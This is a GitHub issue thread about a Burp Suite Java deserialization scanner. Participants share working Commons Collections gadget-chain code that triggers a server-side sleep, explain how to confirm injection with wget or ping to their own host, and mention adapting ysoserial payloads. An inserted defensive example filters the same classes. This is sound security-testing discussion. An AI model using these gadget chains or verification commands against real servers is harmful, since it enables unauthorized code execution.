federicodotta / Java-Deserialization-Scanner

All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities

Question about native Java sleep payload #10

Closed pyno closed 6 years ago

pyno commented 7 years ago

Hi Federico! I'm using your scanner and it seems amazing! Thanks for your work.

I'm in a situation in which only the payload "Apache Commons Collections 3 Alternate payload 2" (added in commit 4a29cc355c3a368486b552b4db4dac9952ba3537 in src/burp/BurpExtender.java, row 159) of your scanner causes the web application to sleep for 10 seconds, but I'm not able to replicate this payload.

To understand why only the "native sleep payload" fires, I'm trying to craft the chain myself by modifying ysoserial's code. In particular I've tried this chain in CommonsCollections5.java:

    public BadAttributeValueExpException getObject(final String command) throws Exception {
        // inert chain used while the object graph is being built
        final Transformer transformerChain = new ChainedTransformer(
                new Transformer[]{ new ConstantTransformer(1) });
        // real chain: Thread.class -> getMethod("sleep", long) -> invoke(null, 10000L)
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Thread.class),
                new InvokerTransformer("getMethod",
                        new Class[]{ String.class, Class[].class },
                        new Object[]{ "sleep", new Class[]{Long.TYPE} }),
                new InvokerTransformer("invoke",
                        new Class[]{ Object.class, Object[].class },
                        new Object[]{ null, new Object[] {10000L} }), // static method: null receiver
                new ConstantTransformer(1) };
        final Map innerMap = new HashMap();

        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        Field valfield = val.getClass().getDeclaredField("val");
        valfield.setAccessible(true);
        valfield.set(val, entry);

        Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

        return val;
    }

This gives me a payload quite identical to yours, but it does not work!

I would like to know how you generated the payload, can you help me? Many thanks!

py

federicodotta commented 7 years ago

Hi py!

If you have 10 seconds of sleep only for that payload, almost surely the application is vulnerable and you can use ysoserial for the exploitation (the exploitation tab of the plugin is more comfortable). Have you tried the DNS vector for the same payload? If it does not work, maybe a firewall in front of the target application blocks DNS requests.

However, this is the code I used to generate the sleep payload:

    public BadAttributeValueExpException getObject(final String command) throws Exception {

        final Object[] execArgs = new Object[] {Long.parseLong(command)};

        // inert chain for setup
        final Transformer transformerChain = new ChainedTransformer(
                new Transformer[]{ new ConstantTransformer(1) });
        // real chain for after setup

        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(java.lang.Thread.class),
                new InvokerTransformer("getMethod", new Class[] {
                    String.class, Class[].class }, new Object[] {
                    "sleep", new Class[]{long.class} }),
                new InvokerTransformer("invoke", new Class[] {
                    Object.class, Object[].class }, new Object[] {
                    new Class[] { long.class }, execArgs }),
                new ConstantTransformer(1) };

        final Map innerMap = new HashMap();

        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        BadAttributeValueExpException val = new BadAttributeValueExpException(null);
        Field valfield = val.getClass().getDeclaredField("val");
        valfield.setAccessible(true);
        valfield.set(val, entry);

        Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

        return val;
    }

If you compile that code, you can pass a value in milliseconds (10000 for 10 seconds) and generate a sleep payload like mine.

I hope I was helpful. If you need more help please let me know.

Have a nice evening! Federico
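On the defending side, the chain above is built entirely from class names that a look-ahead ObjectInputStream can refuse before anything is instantiated. This is an added example, not code from the plugin or from ysoserial; it uses a denylist of the classes named in the thread (an allowlist of expected classes, or the JDK 9+ ObjectInputFilter, is the stronger production choice), and the two serialized inputs in main are constructed for the demo.

```java
import java.io.*;
import java.util.*;

// Look-ahead ObjectInputStream: resolveClass runs for each class descriptor before the
// object is instantiated, so the chain is refused before any toString()/sleep side effect.
public class LookAheadObjectInputStream extends ObjectInputStream {

    // Classes the CommonsCollections sleep chain in this thread is built from.
    private static final Set<String> DENIED = Set.of(
        "javax.management.BadAttributeValueExpException",
        "org.apache.commons.collections.keyvalue.TiedMapEntry",
        "org.apache.commons.collections.map.LazyMap",
        "org.apache.commons.collections.functors.ChainedTransformer",
        "org.apache.commons.collections.functors.InvokerTransformer",
        "org.apache.commons.collections.functors.ConstantTransformer");
    // Block the rest of commons-collections 3 as well: other gadget classes live there.
    private static final String DENIED_PREFIX = "org.apache.commons.collections.";

    public LookAheadObjectInputStream(InputStream in) throws IOException { super(in); }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc)
            throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (DENIED.contains(name) || name.startsWith(DENIED_PREFIX)) {
            // Worth logging: a denied class in an inbound stream is itself a detection signal.
            throw new InvalidClassException(name, "blocked by deserialization filter");
        }
        return super.resolveClass(desc);
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: a harmless HashMap and the JDK class that roots the chain above.
        byte[] benign = serialize(new HashMap<String, Integer>());
        byte[] gadgetRoot = serialize(new javax.management.BadAttributeValueExpException(null));
        for (byte[] data : new byte[][] {benign, gadgetRoot}) {
            try (ObjectInputStream ois = new LookAheadObjectInputStream(new ByteArrayInputStream(data))) {
                System.out.println("accepted: " + ois.readObject().getClass().getName());
            } catch (InvalidClassException e) {
                System.out.println("rejected: " + e.classname + " (" + e.getMessage() + ")");
            }
        }
    }
}
```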

pyno commented 7 years ago

Hi Federico,

Thank you very much for the quick reply! I've done more testing and figured out the problem with my payloads: I was encoding them in base64, but not making them URL-safe! Both the above codes are working great.

Thank you again for your time, py

ghost commented 6 years ago

Hello Federico, pyno

I also use your awesome scanner

I got 10 seconds of sleep with "Apache Commons Collections 3 (Sleep): Potentially VULNERABLE!!!", but when I use the Exploiting tab and put "CommonsCollections3 sleep(20000)" into the textbox it does not work. I also modified the code as you suggested above; it still does not work in my case.

Could you possibly help me with how you guys generated the payload. Thank you very much~~~

pyno commented 6 years ago

Hi! I've had the same problem some time ago, and I worked out that the sleep in the scanner and the one you are trying to execute with the Exploiting tab are different. The payload of the scanner does something like

    java.lang.Thread.sleep(10)

but in the exploitation tab your code is put by ysoserial into a runtime.exec, and what you are trying to execute is something like:

    Runtime.getRuntime().exec("sleep(20000)")

First, the difference is that the first one is executed synchronously by the serving thread, and the second is done asynchronously because a new process is created by the Runtime.exec method (see https://docs.oracle.com/javase/7/docs/api/java/lang/Process.html).

Second, you are trying to execute on a shell the command sleep(20000), but the syntax is incorrect and should be sleep 20000 (assuming the web server is running on Linux).

To verify the injection you can try to expose a web server (or simply a port) and do something like:

    wget <your_IP>/index.html

or simply:

    ping <your_IP>

while listening with wireshark/tshark on your machine.

Hope this will help you :) py

federicodotta commented 6 years ago

Hello Java20150,

As py correctly said, the plugin executes a Java sleep and not a system one, because the latter is executed asynchronously.

To verify the injection you can also use the Collaborator. Java Deserialization Scanner has two sets of detection payloads: one with Java sleep and one with Java DNS resolution. With the DNS resolution payloads and the Collaborator you can verify the injection also if you don't have an authoritative DNS server.

Only pay attention that the target server can potentially filter outbound traffic and outbound DNS requests: in this case you will not get any Collaborator interaction nor any HTTP request (using wget/ping/etc.)!

Federico

ghost commented 6 years ago

Thank you for your help

I was confused between "java sleep" and "system sleep"; thank you guys for correcting me.

Finally, I got it now. I was in a restricted environment; DNS, wget, and ping are not allowed. So I rewrote the serialization payload in ysoserial.jar and checked for an existing file on the server instead.

Your plugin is awesome, ^_^

weixiaobao

runn3t commented 1 year ago

Hello everyone,

I would like to know how you, @federicodotta, generated the payload "Apache Commons Collections 3 Alternate payload 4 (Sleep)", because I am trying to craft it myself but I can't.

Kind regards!